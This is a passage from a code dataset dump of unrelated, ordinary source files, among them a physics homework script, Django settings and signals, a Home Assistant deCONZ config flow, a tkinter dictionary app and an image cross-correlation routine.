halos_plot(f,r,nhalos):\n fig = plt.figure(figsize=(7,5))\n xmin = 1e-4\n xmax = 5\n log_xmin = np.log10(xmin)\n log_xmax = np.log10(xmax)\n b = np.logspace(xmin,xmax,21) # 1e-4, x_max = 5\n data = np.logspace(xmin,xmax,20)\n N_x_dist = np.arange(1.e-4,5,0.001) # 1000 vals\n N_dist = f(N_x_dist)\n bin_vals,bins,patches = plt.hist(r,bins=b,histtype='step')\n plt.cla()\n new_bin_vals = calc_average_number_of_satallites_per_bin(bin_vals,\n bins,\n nhalos)\n plt.title('$\\log$-$\\log$ of N(x)')\n plt.xlabel('$\\log$[x]',fontsize=14)\n plt.ylabel('$\\log$[N(x)]',fontsize=14)\n plt.xscale('log')\n plt.yscale('log')\n plt.plot(N_x_dist,N_dist,c='b')\n plt.hist(data,weights=new_bin_vals,\n bins=b,color='k',histtype='step')\n plt.savefig('plt4.png',format='png')\n# def write_to_file():\n# continue\n\ndef problem_1(seed):\n\n rand = random_number_generator # function alias\n thou = 1000\n mil = 1000000 # np.zeros won't accept 1e6\n\n # 1a\n poisson_out_1 = poisson_dist(1,0)\n poisson_out_2 = poisson_dist(5,10)\n poisson_out_3 = poisson_dist(3,21)\n poisson_out_4 = poisson_dist(2.6,40)\n print('poisson results: {}, {}, {}, {}\\n'.format(poisson_out_1,\n poisson_out_2,\n poisson_out_3,\n poisson_out_4))\n\n # 1b\n x = np.zeros(thou)\n x_1 = np.zeros(thou)\n for i in range(len(x)):\n x[i],seed = rand(seed)\n x_1[i],seed = rand(seed)\n rand_thousand_plot(x,x_1)\n x_mil = np.zeros(mil)\n for i in range(len(x_mil)):\n x_mil[i],seed = rand(seed)\n rand_million_plot(x_mil)\n print('rng plots made.\\n')\n\n\ndef problem_2(seed):\n\n rand = random_number_generator # function alias\n\n # a,b,c are greater than [0,1] from random number generator, so we\n # multiply by (ub-lb)*rand + lb to have a random number in the given range\n # notice: ub/lb --> upper/lower bound\n nhalos = 1000 # number of halos each containing 100 satellites\n nsats = 100 # number of satellites for all of problem 2\n x,seed = rand(seed)\n y,seed = rand(seed)\n z,seed = rand(seed) # x,y,z update the rng for a,b,c constants\n a = 1.4 * x + 1.1\n b = 1.5 * y + 0.5\n c = 2.5 * z + 1.5 # a, b, c used for all of problem 2\n\n # 2a\n # we can reduce the dimensions of the integrand from 3D -> 1D using\n # phi, theta symmetry\n n_r = lambda x: 4*np.pi*x**2*(x/b)**(a-3)*np.e**(-(x/b)**c)\n lower_bound = 0\n upper_bound = 5\n steps = 5\n int_f = calc_integral(n_r,lower_bound,upper_bound,steps)\n A = 1/int_f\n print('constants: A, a, b, c : {}, {}, {}, {}\\n'.format(A,a,b,c))\n\n # 2b\n # list comprehension is faster than for loop and working with tuples is\n # also slightly faster than with lists\n x_range = (1e-4,1e-2,1e-1,1,5)\n xi = np.log10(x_range)\n n_r_vals = [n_r(x) for x in x_range]\n interp = np.interp(xi,x_range,n_r_vals)\n # interp = interp1d_spline(xi,x_range,func_vals)\n interp1d_plot(x_range,n_r_vals,interp)\n print('1D interpolation plotted.\\n')\n\n # 2c\n n_x = lambda x: A*nsats*(x/b)**(a-3)*np.e**(-(x/b)**c)\n dx = calc_derivative(n_x,b)\n analytic_dx = -A*nsats*(c-a+3)/(b*np.e)\n # by hand and confirmed using W-alpha\n print('numerical dn(x)/dx: {}, analytical dn(x)/dx: {}\\n'\\\n .format(np.round(dx,12),np.round(analytic_dx,12)))\n\n # 2d\n halo = generate_satellite_profile(n_x,nsats,seed)\n print('single halo profile in (r,theta,phi) coords.:\\n{}'\\\n .format(halo))\n\n # 2e\n N_x = lambda x: n_x(x)*4*np.pi*x**2\n halos,r = generate_halo_profile(nsats,nhalos,N_x,seed)\n halos_plot(N_x,r,nhalos)\n\n # 2f\n a = 1e-8 # something really close to 0 but not 0\n b = 5\n root = 0.5\n tolerance = 1e-6\n root = 
calc_roots(N_x,a,b,tolerance,root)\n print('root: {}\\n'.format(root))\n\n # 2g\n # quantiles desired\n p16 = 16\n p50 = 50\n p84 = 84\n r_sorted = halos[0][0] # radial bin of first halo, want it for largest number of galaxies\n quicksort(r_sorted)\n q1 = calc_quantile(r_sorted,p16)\n q2 = calc_quantile(r_sorted,p50)\n q3 = calc_quantile(r_sorted,p84)\n print('16, 50, 84 quantiles: {}, {}, {}'.format(q1,q2,q3))\n\n # 2h normalization and 3d interp\n print('2h not implemented.')\n\ndef problem_3(seed):\n print('this shit hard fam. problem 3 not implemented.')\n\ndef main():\n seed = 0 # random seed for assignment\n\n print('nur assignment 1. beginning, please wait......................\\n')\n\n print('seed is {}\\n'.format(seed))\n # q1 outputs\n problem_1(seed)\n\n # q2 outputs\n problem_2(seed)\n\n # q3 outputs\n problem_3(seed)\n\n print('completed. please take a look at the pdf.\\n')\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"handin1/handin1.py","file_name":"handin1.py","file_ext":"py","file_size_in_byte":19628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"28318807","text":"# coding:utf-8\n\n# Redis expiry for image captcha codes\nIMAGE_REDIS_EXPIRES = 180\n\n# Redis expiry for SMS verification codes, in seconds\nSMS_CODE_REDIS_EXPIRES = 300\n\n# Interval between sending SMS verification codes, in seconds\nSEND_SMS_CODE_INTERVAL = 60\n\n# Maximum number of login errors allowed\nLOGIN_ERROR_MAX_TIMES = 5\n\n# Lockout duration after too many input errors\nLOGIN_ERROR_FORBID_TIME = 600\n\n# Qiniu domain\nQINIU_URL_DOMAIN = \"http://o91qujnqh.bkt.clouddn.com/\"\n\n# Cache time for district information, in seconds\nAREA_INFO_REDIS_CACHE_EXPIRES = 7200\n\n\n\n# Number of items per page on the house list page\nHOUSE_LIST_PAGE_CAPACITY = 2\n\n# Cache time for house list page counts, in seconds\nHOUES_LIST_PAGE_REDIS_CACHE_EXPIRES = 7200\n\n\n# Maximum number of houses shown on the home page\nHOME_PAGE_MAX_HOUSES = 5\n\n# Redis cache time for home page house data, in seconds\nHOME_PAGE_DATA_REDIS_EXPIRES = 7200\n\n# Maximum number of comments shown on the house detail page\nHOUSE_DETAIL_COMMENT_DISPLAY_COUNTS = 30\n\n# Redis cache time for house detail page data, in seconds\nHOUSE_DETAIL_REDIS_EXPIRE_SECOND = 7200","sub_path":"ihome/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"554469160","text":"# _*_ coding:utf-8 _*_\n__author__ = 'imbaqian'\n__date__ = '2018/8/7 14:35'\n\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom .models import UserFav\n\n\n# Use a signal to increase the favorite count: each new favorite on a goods item creates a UserFav\n@receiver(post_save, sender=UserFav)\ndef create_userfav(sender, instance=None, created=False, **kwargs):\n if created:\n goods = instance.goods\n goods.fav_num += 1\n goods.save()\n\n\n# Use a signal to decrease the favorite count: each removed favorite on a goods item deletes a UserFav\n@receiver(post_delete, sender=UserFav)\ndef delete_userfav(sender, instance=None, created=False, **kwargs):\n goods = instance.goods\n goods.fav_num -= 1\n goods.save()","sub_path":"apps/user_operation/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"381835563","text":"\"\"\" Webserver with module example. \"\"\"\n# This file is intended to be run as a cron script. Upon execution, it does\n# its thing and shuts down.\n\nimport argparse\nimport os\nfrom aiohttp import web\n\nfrom aries_staticagent import StaticConnection, Module, route, utils\n\n\ndef environ_or_required(key):\n \"\"\" Pull arg from environment or require it in args. 
\"\"\"\n if os.environ.get(key):\n return {'default': os.environ.get(key)}\n\n return {'required': True}\n\n# above from https://stackoverflow.com/questions/10551117/setting-options-from-environment-variables-when-using-argparse\n# Thought: Should we include arg parsing help into the staticagent library?\n\n\ndef config():\n \"\"\" Get StaticConnection parameters from env or command line args. \"\"\"\n parser = argparse.ArgumentParser()\n # endpoint can be http or ws, auto handled by staticagent library.\n parser.add_argument(\n '--endpoint',\n **environ_or_required('ARIES_ENDPOINT')\n )\n parser.add_argument(\n '--endpointkey',\n **environ_or_required('ARIES_ENDPOINT_KEY')\n )\n parser.add_argument(\n '--mypublickey',\n **environ_or_required('ARIES_MY_PUBLIC_KEY')\n )\n parser.add_argument(\n '--myprivatekey',\n **environ_or_required('ARIES_MY_PRIVATE_KEY')\n )\n parser.add_argument(\n '--port',\n **environ_or_required('PORT')\n )\n args = parser.parse_args()\n return args\n\n\nclass BasicMessageCounter(Module):\n \"\"\" A BasicMessage module that responds with the number of messages\n received.\n \"\"\"\n DOC_URI = 'did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/'\n PROTOCOL = 'basicmessage'\n VERSION = '1.0'\n\n def __init__(self):\n super().__init__()\n self.count = 0\n\n @route\n async def message(self, _msg, conn):\n \"\"\" Respond to basic messages with a count of messages received. \"\"\"\n self.count += 1\n await conn.send_async({\n \"@type\": self.type(\"message\"),\n \"~l10n\": {\"locale\": \"en\"},\n \"sent_time\": utils.timestamp(),\n \"content\": \"{} message(s) received.\".format(self.count)\n })\n\n\ndef main():\n \"\"\" Create connection and start web server. \"\"\"\n args = config()\n conn = StaticConnection(\n args.mypublickey,\n args.myprivatekey,\n args.endpointkey,\n args.endpoint,\n )\n\n bmc = BasicMessageCounter()\n conn.route_module(bmc)\n\n async def handle(request):\n \"\"\" aiohttp handle POST. 
\"\"\"\n await conn.handle(await request.read())\n raise web.HTTPAccepted()\n\n app = web.Application()\n app.add_routes([web.post('/', handle)])\n\n web.run_app(app, port=args.port)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/webserver_with_module.py","file_name":"webserver_with_module.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"204434937","text":"from tests.online_test.cases.IntelligenceCountry.test_intelligence_ios import TestIntelligenceIOS\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_gp import TestIntelligenceGP\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_ua import TestIntelligenceUA\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_pub import TestIntelligencePub\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_com import TestIntelligenceCom\nfrom tests.online_test.constants.settings import TEST_PROCESS_NUM\nfrom tests.online_test.multi_main.base_task_manager import BaseTaskManager\nfrom tests.online_test.constants.test_simple import MarketSlug\nfrom tests.online_test.multi_main.runner import CaseRunner\n\n\n\n\nclass CountryTaskManager(BaseTaskManager):\n def __init__(self,test_market):\n self.test_market = test_market\n BaseTaskManager.__init__(self)\n\n def _get_case_list(self):\n if self.test_market.lower() == MarketSlug.IOS:\n self._format_case(TestIntelligenceIOS._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.GP:\n self._format_case(TestIntelligenceGP._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.ALL_STORE:\n self._format_case(TestIntelligenceUA._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.PUBLISHER:\n self._format_case(TestIntelligencePub._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.COMPANY:\n self._format_case(TestIntelligenceCom._get_format_parameters())\n else:\n raise ValueError('Please add the correct \"TEST_MARKET\"')\n\n def _add_run_to_process(self):\n for i in range(TEST_PROCESS_NUM):\n runner = CaseRunner(self.Result, self.Fault, self.Cases, self.test_market.lower())\n runner.daemon=False\n runner.start()\n self.process_list.append(runner)\n\n","sub_path":"tests/online_test/multi_main/country_task_manager.py","file_name":"country_task_manager.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"366927158","text":"List = input('Please enter the list to sort\\n').split()\r\nList = [int(x) for x in List]\r\n\r\n\r\ndef bubblesort(List):\r\n length = len(List)\r\n for i in range(1,length):\r\n flag = 0\r\n for j in range(0,length-i):\r\n if List[j] > List[j+1]:\r\n List[j],List[j+1] = List[j+1],List[j]\r\n flag = 1\r\n if flag == 0:\r\n break\r\n \r\n\r\nbubblesort(List)\r\nprint(List)\r\n","sub_path":"冒泡.py","file_name":"冒泡.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"120026417","text":"import numpy as np\nimport numba\nfrom collections import namedtuple\nfrom tqdm import tqdm\n\ndetections = namedtuple('Detections', ['N_1', 'N_2', 'N_12', 'N_gate'])\n\n\n@numba.njit(parallel=True)\ndef _simulate_detection_classical(rate_1, e_rate_1, rate_2, e_rate_2, N_gate):\n\n    N_gate = int(N_gate)\n\n    det1 = np.random.random(size=N_gate)\n    det2 = np.random.random(size=N_gate)\n    err1 = 
np.random.random(size=N_gate)\n err2 = np.random.random(size=N_gate)\n\n bool1 = det1 < rate_1 / 2\n bool2 = det2 < rate_2 / 2\n\n e_bool1 = err1 < e_rate_1\n e_bool2 = err2 < e_rate_2\n\n bool1 = np.logical_or(bool1, e_bool1)\n bool2 = np.logical_or(bool2, e_bool2)\n\n n_1 = np.sum(bool1)\n n_2 = np.sum(bool2)\n n_12 = np.sum(bool1 * bool2)\n\n return (n_1, n_2, n_12, N_gate)\n\n\n@numba.njit(parallel=True)\ndef _simulate_detection_quantum(rate_1, e_rate_1, rate_2, e_rate_2, N_gate):\n\n N_gate = int(N_gate)\n\n which_way = np.random.random(size=N_gate) > .5\n\n det1 = np.random.random(size=N_gate)\n det2 = np.random.random(size=N_gate)\n err1 = np.random.random(size=N_gate)\n err2 = np.random.random(size=N_gate)\n\n bool1 = np.logical_and(det1 < rate_1, which_way)\n bool2 = np.logical_and(det2 < rate_2, np.logical_not(which_way))\n\n e_bool1 = err1 < e_rate_1\n e_bool2 = err2 < e_rate_2\n\n bool1 = np.logical_or(bool1, e_bool1)\n bool2 = np.logical_or(bool2, e_bool2)\n\n n_1 = np.sum(bool1)\n n_2 = np.sum(bool2)\n n_12 = np.sum(bool1 * bool2)\n\n return (n_1, n_2, n_12, N_gate)\n\n\ndef simulate_detection_classical(*args):\n return detections(*_simulate_detection_classical(*args))\n\n\ndef simulate_detection_quantum(*args):\n return detections(*_simulate_detection_quantum(*args))\n\n\ndef simulate_detections_classical(size, *args):\n n_1_arr = []\n n_2_arr = []\n n_12_arr = []\n n_gate_arr = []\n\n for _ in range(size):\n det = simulate_detection_classical(*args)\n n_1, n_2, n_12, n_gate = det\n n_1_arr.append(n_1)\n n_2_arr.append(n_2)\n n_12_arr.append(n_12)\n n_gate_arr.append(n_gate)\n\n return (detections(np.array(n_1_arr), np.array(n_2_arr),\n np.array(n_12_arr), np.array(n_gate_arr)))\n\n\ndef simulate_detections_quantum(size, *args):\n n_1_arr = []\n n_2_arr = []\n n_12_arr = []\n n_gate_arr = []\n\n for _ in range(size):\n det = simulate_detection_quantum(*args)\n n_1, n_2, n_12, n_gate = det\n n_1_arr.append(n_1)\n n_2_arr.append(n_2)\n n_12_arr.append(n_12)\n n_gate_arr.append(n_gate)\n\n return (detections(np.array(n_1_arr), np.array(n_2_arr),\n np.array(n_12_arr), np.array(n_gate_arr)))\n\n\ndef g_from_detections(*detections):\n\n n_1, n_2, n_12, n_gate = detections\n\n print('starting')\n for N in n_12:\n if N > 0:\n print(N)\n\n return n_12 * n_gate / n_1 / n_2\n\n\ndef simulate_g(*args):\n n_1, n_2, n_12, n_gate = simulate_detection_classical(*args)\n\n g = g_from_detections(n_1, n_2, n_12, n_gate)\n return g\n\n\n# def get_statistics(rates_1=RATES,\n# rates_2=None,\n# number_samples=SAMPLE_SIZE_STATISTIC):\n\n# if rates_2 is None:\n# rates_2 = rates_1\n\n# deviations = []\n# means = []\n\n# for r_1, r_2 in tqdm(zip(rates_1, rates_2)):\n# gs = []\n# for _ in range(number_samples):\n# gs.append(g_from_detections(r_1, r_2))\n# deviations.append(np.std(gs))\n# means.append(np.average(gs))\n\n# return statistics(means, deviations)\n","sub_path":"quantum_optics/single_photon/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"586078053","text":"from tkinter import *\nfrom tkinter import messagebox\nimport tkinter.font as font\nimport json\nimport platform\nfrom difflib import get_close_matches\n\nroot = Tk()\nroot.title(\"Dictionary v1.0\")\nroot.resizable(False, False)\nroot['background'] = \"#313131\"\n\ndef fetch_data(word):\n # //////////////////// GET OS ////////////////////\n platform_type = platform.system()\n\n # //////////////////// 
DICTIONARY ////////////////////\n \n if platform_type == 'Windows':\n\n data = json.load(open(r\".\\Data\\data.json\"))\n\n def searchdic(word):\n word = word.lower()\n if word in data:\n return data[word]\n elif word.title() in data:\n return data[word.title()]\n elif word.upper() in data:\n return data[word.upper()]\n elif len(get_close_matches(word, data.keys())) > 0:\n swyon_msg = \"Did you mean \" + get_close_matches(word, data.keys())[0] + \" word instead?\"\n swyon = messagebox.askquestion ('Word Guess',swyon_msg,icon = 'warning')\n if swyon == \"yes\":\n return data[get_close_matches(word, data.keys())[0]]\n elif swyon == \"no\":\n return (\"\\nThe word does not exist! \")\n else:\n return (\"\\nThe word does not exist! \")\n else:\n return \"\\nThe word does not exist\"\n\n output = searchdic(word)\n\n if type(output) == list:\n for item in output:\n tmain.insert(END, \"\\n\\n\" + item)\n print(\"\\n\" + item)\n\n\n else:\n tmain.insert(END, \"\\n\" + output)\n print(output)\n\n\n else:\n\n data = json.load(open(r\"./Data/data.json\"))\n\n def searchdic(word):\n word = word.lower()\n if word in data:\n return data[word]\n elif word.title() in data:\n return data[word.title()]\n elif word.upper() in data:\n return data[word.upper()]\n elif len(get_close_matches(word, data.keys())) > 0:\n swyon_msg = \"Did you mean \" + get_close_matches(word, data.keys())[0] + \" word instead?\"\n swyon = messagebox.askquestion ('Word Guess',swyon_msg,icon = 'warning')\n if swyon == \"yes\":\n return data[get_close_matches(word, data.keys())[0]]\n elif swyon == \"no\":\n return (\"\\nThe word does not exist! \")\n else:\n return (\"\\nThe word does not exist! \")\n else:\n return \"\\nThe word does not exist\"\n\n output = searchdic(word)\n\n if type(output) == list:\n for item in output:\n tmain.insert(END, \"\\n\\n\" + item)\n print(\"\\n\" + item)\n\n\n else:\n tmain.insert(END, \"\\n\" + output)\n print(output)\n\n\ndef clear():\n egword.delete(0, END)\n tmain.delete(\"1.0\", END)\n\ndef save_to_txt():\n current_word = egword.get() + \".txt\"\n current_meaning = tmain.get(\"1.0\", END)\n\n file = open(current_word, \"w+\")\n file.write(current_meaning)\n file.close()\n\ndef search():\n search_word = egword.get()\n fetch_data(search_word)\n \nfontbtn = font.Font(family=\"Arial\", size=\"13\", weight=\"bold\")\n\nltop = Label(root, text=\"Dictionary\", bg=\"#313131\", fg=\"#FFFFFF\")\nltop.grid(row=2, column=0, columnspan=3)\nltop['font'] = font.Font(family=\"Arial\", size=\"15\", weight=\"bold\")\n\negword = Entry(root, bg=\"#C5C5C5\", fg=\"#000000\", width=37, borderwidth=6)\negword.grid(row=3, column=0, columnspan=3, pady=5)\negword['font'] = font.Font(family=\"Arial\", size=\"12\", weight=\"bold\")\n\ntmain = Text(root, height=10, width=40, bg=\"#C5C5C5\", fg=\"#000000\")\ntmain.grid(row=4, column=0, columnspan=3, pady=5)\ntmain['font'] = font.Font(family=\"Arial\", size=\"12\")\n\nbsearch = Button(root, text=\"Search\", command=search, padx=60, bg=\"#007700\", fg=\"#FFFFFF\")\nbsearch.grid(row=5, column=0, columnspan=1)\nbsearch['font'] = fontbtn\n\nbsave = Button(root, text=\"Save\", command=save_to_txt, padx=20, bg=\"#D3A500\", fg=\"#FFFFFF\")\nbsave.grid(row=5, column=1, columnspan=1)\nbsave['font'] = fontbtn\n\nbclear = Button(root, text=\"Clear\", command=clear, padx=20, bg=\"#DC0000\", fg=\"#FFFFFF\")\nbclear.grid(row=5, column=2, columnspan=1)\nbclear['font'] = 
fontbtn\n\nroot.mainloop()\n","sub_path":"GUI/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"377568901","text":"# This example demonstrates inheritance and derivation\n\nclass Human(object):\n    '''This class describes behaviors shared by all humans'''\n    def say(self, that):\n        print(\"Says:\", that)\n    def walk(self, distance):\n        print(\"Walked\", distance, \"km\")\n\nclass Student(Human):\n    # def say(self, that):\n    #     print(\"Says:\", that)\n    # def walk(self, distance):\n    #     print(\"Walked\", distance, \"km\")\n    def study(self, subject):\n        print(\"Studying:\", subject)\n\nclass Teacher(Student):\n    def teach(self, subject):\n        print(\"Teaching:\", subject)\n\nh1 = Human()\nh1.say(\"It is really cold today!\")\nh1.walk(5)\n\ns1 = Student()\ns1.say(\"Studying is a bit tiring\")\ns1.walk(3)\ns1.study('python')\n\nt1 = Teacher()\nt1.say(\"Tomorrow is Friday\")\nt1.walk(6)\nt1.teach('object-oriented programming (OOP)')\nt1.study('python3')\n\n","sub_path":"aid1805/pbase/89_inheritance.py","file_name":"89_inheritance.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"158944662","text":"import os\nfrom pocketsphinx import LiveSpeech, get_model_path\n\nmodel_path = get_model_path()\n\nspeech = LiveSpeech(\n    verbose=False,\n    sampling_rate=16000,\n    buffer_size=1024,\n    no_search=False,\n    full_utt=False,\n    hmm=os.path.join(model_path, 'cmusphinx-en-us-8khz-5.2'),\n    lm=os.path.join(model_path, '6618.lm'),\n    dic=os.path.join(model_path, '6618.dic')\n)\ndef sphinx():\n    for phrase in speech:\n        print('Recognized:', phrase)\n        # print(phrase.segments(detailed=True))\n        if str(phrase) == 'MOSS':\n            print('Wake word detected')\n            return 'wakeup'\n\n# sphinx()","sub_path":"smartZN/wakeup.py","file_name":"wakeup.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"335140433","text":"\"\"\"Config flow to configure deCONZ component.\"\"\"\n\nimport voluptuous as vol\n\nfrom homeassistant import config_entries, data_entry_flow\nfrom homeassistant.core import callback\nfrom homeassistant.const import CONF_API_KEY, CONF_HOST, CONF_PORT\nfrom homeassistant.helpers import aiohttp_client\nfrom homeassistant.util.json import load_json\n\nfrom .const import (\n    CONF_ALLOW_DECONZ_GROUPS, CONF_ALLOW_CLIP_SENSOR, CONFIG_FILE, DOMAIN)\n\n\nCONF_BRIDGEID = 'bridgeid'\n\n\n@callback\ndef configured_hosts(hass):\n    \"\"\"Return a set of the configured hosts.\"\"\"\n    return set(entry.data[CONF_HOST] for entry\n               in hass.config_entries.async_entries(DOMAIN))\n\n\n@config_entries.HANDLERS.register(DOMAIN)\nclass DeconzFlowHandler(data_entry_flow.FlowHandler):\n    \"\"\"Handle a deCONZ config flow.\"\"\"\n\n    VERSION = 1\n\n    def __init__(self):\n        \"\"\"Initialize the deCONZ config flow.\"\"\"\n        self.bridges = []\n        self.deconz_config = {}\n\n    async def async_step_init(self, user_input=None):\n        \"\"\"Handle a deCONZ config flow start.\n\n        Only allows one instance to be set up.\n        If only one bridge is found go to link step.\n        If more than one bridge is found let user choose bridge to link.\n        \"\"\"\n        from pydeconz.utils import async_discovery\n\n        if configured_hosts(self.hass):\n            return self.async_abort(reason='one_instance_only')\n\n        if user_input is not None:\n            for bridge in self.bridges:\n                if bridge[CONF_HOST] == user_input[CONF_HOST]:\n                    self.deconz_config = bridge\n                    return await self.async_step_link()\n\n        session = aiohttp_client.async_get_clientsession(self.hass)\n        self.bridges = await async_discovery(session)\n\n        if 
len(self.bridges) == 1:\n self.deconz_config = self.bridges[0]\n return await self.async_step_link()\n elif len(self.bridges) > 1:\n hosts = []\n for bridge in self.bridges:\n hosts.append(bridge[CONF_HOST])\n return self.async_show_form(\n step_id='init',\n data_schema=vol.Schema({\n vol.Required(CONF_HOST): vol.In(hosts)\n })\n )\n\n return self.async_abort(\n reason='no_bridges'\n )\n\n async def async_step_link(self, user_input=None):\n \"\"\"Attempt to link with the deCONZ bridge.\"\"\"\n from pydeconz.utils import async_get_api_key\n errors = {}\n\n if user_input is not None:\n if configured_hosts(self.hass):\n return self.async_abort(reason='one_instance_only')\n session = aiohttp_client.async_get_clientsession(self.hass)\n api_key = await async_get_api_key(session, **self.deconz_config)\n if api_key:\n self.deconz_config[CONF_API_KEY] = api_key\n return await self.async_step_options()\n errors['base'] = 'no_key'\n\n return self.async_show_form(\n step_id='link',\n errors=errors,\n )\n\n async def async_step_options(self, user_input=None):\n \"\"\"Extra options for deCONZ.\n\n CONF_CLIP_SENSOR -- Allow user to choose if they want clip sensors.\n CONF_DECONZ_GROUPS -- Allow user to choose if they want deCONZ groups.\n \"\"\"\n from pydeconz.utils import async_get_bridgeid\n\n if user_input is not None:\n self.deconz_config[CONF_ALLOW_CLIP_SENSOR] = \\\n user_input[CONF_ALLOW_CLIP_SENSOR]\n self.deconz_config[CONF_ALLOW_DECONZ_GROUPS] = \\\n user_input[CONF_ALLOW_DECONZ_GROUPS]\n\n if CONF_BRIDGEID not in self.deconz_config:\n session = aiohttp_client.async_get_clientsession(self.hass)\n self.deconz_config[CONF_BRIDGEID] = await async_get_bridgeid(\n session, **self.deconz_config)\n\n return self.async_create_entry(\n title='deCONZ-' + self.deconz_config[CONF_BRIDGEID],\n data=self.deconz_config\n )\n\n return self.async_show_form(\n step_id='options',\n data_schema=vol.Schema({\n vol.Optional(CONF_ALLOW_CLIP_SENSOR): bool,\n vol.Optional(CONF_ALLOW_DECONZ_GROUPS): bool,\n }),\n )\n\n async def async_step_discovery(self, discovery_info):\n \"\"\"Prepare configuration for a discovered deCONZ bridge.\n\n This flow is triggered by the discovery component.\n \"\"\"\n deconz_config = {}\n deconz_config[CONF_HOST] = discovery_info.get(CONF_HOST)\n deconz_config[CONF_PORT] = discovery_info.get(CONF_PORT)\n deconz_config[CONF_BRIDGEID] = discovery_info.get('serial')\n\n config_file = await self.hass.async_add_job(\n load_json, self.hass.config.path(CONFIG_FILE))\n if config_file and \\\n config_file[CONF_HOST] == deconz_config[CONF_HOST] and \\\n CONF_API_KEY in config_file:\n deconz_config[CONF_API_KEY] = config_file[CONF_API_KEY]\n\n return await self.async_step_import(deconz_config)\n\n async def async_step_import(self, import_config):\n \"\"\"Import a deCONZ bridge as a config entry.\n\n This flow is triggered by `async_setup` for configured bridges.\n This flow is also triggered by `async_step_discovery`.\n\n This will execute for any bridge that does not have a\n config entry yet (based on host).\n\n If an API key is provided, we will create an entry.\n Otherwise we will delegate to `link` step which\n will ask user to link the bridge.\n \"\"\"\n if configured_hosts(self.hass):\n return self.async_abort(reason='one_instance_only')\n\n self.deconz_config = import_config\n if CONF_API_KEY not in import_config:\n return await self.async_step_link()\n\n self.deconz_config[CONF_ALLOW_CLIP_SENSOR] = True\n self.deconz_config[CONF_ALLOW_DECONZ_GROUPS] = True\n return self.async_create_entry(\n 
title='deCONZ-' + self.deconz_config[CONF_BRIDGEID],\n data=self.deconz_config\n )\n","sub_path":"homeassistant/components/deconz/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"223238703","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImage correlation and related functions\n=======================================\n\"\"\"\nfrom functools import partial\nimport numpy as np\nfrom scipy.fftpack import next_fast_len\n\nFFTOPS = {}\ntry:\n from pyfftw.interfaces.numpy_fft import rfft2, irfft2\n FFTOPS['threads'] = 2\nexcept ImportError:\n from numpy.fft import rfft2, irfft2\n\nfrom ..array_utils import mirror\n\nEPS = np.finfo(np.float).eps\n\ndef mnxc2(arr1, arr2, m1 = None, m2 = None, mode = 'full', axes = (0, 1), out = None):\n \"\"\"\n Masked normalized cross-correlation (MNXC) between two images.\n\n Parameters\n ----------\n arr1 : `~numpy.ndarray`, shape (M,N)\n Reference, or 'fixed-image' in the language of _[PADF].\n arr2 : `~numpy.ndarray`, shape (M,N)\n Moving image\n m1 : `~numpy.ndarray`, shape (M,N) or None, optional\n Mask of `arr1`. The mask should evaluate to `True`\n (or 1) on invalid pixels. If None (default), no mask\n is used.\n m2 : `~numpy.ndarray`, shape (M,N) or None, optional\n Mask of `arr2`. The mask should evaluate to `True`\n (or 1) on invalid pixels. If None (default), `m2` is \n taken to be the same as `m1`.\t\n mode : {'full', 'same'}, optional\n 'full':\n By default, mode is 'full'. This returns the convolution\n at each point of overlap, with an output shape of (N+M-1,M+N-1). At\n the end-points of the convolution, the signals do not overlap\n completely, and boundary effects may be seen.\n 'same':\n Mode 'same' returns output of length ``max(M, N)``. Boundary\n effects are still visible.\n axes : 2-tuple of ints, optional\n Axes along which to compute the cross-correlation.\n out : `~numpy.ndarray` or None, optional\n If not None, the results will be stored in `out`. If None, a new array\n is returned.\n \n Returns\n -------\n out : `~numpy.ndarray`\n Masked, normalized cross-correlation. If images are real-valued, then `out` will be\n real-valued as well. For complex input, `out` will be complex as well.\n \n References\n ----------\n .. [PADF] Dirk Padfield. Masked Object Registration in the Fourier Domain. \n IEEE Transactions on Image Processing, vol.21(5), pp. 2706-2718, 2012. 
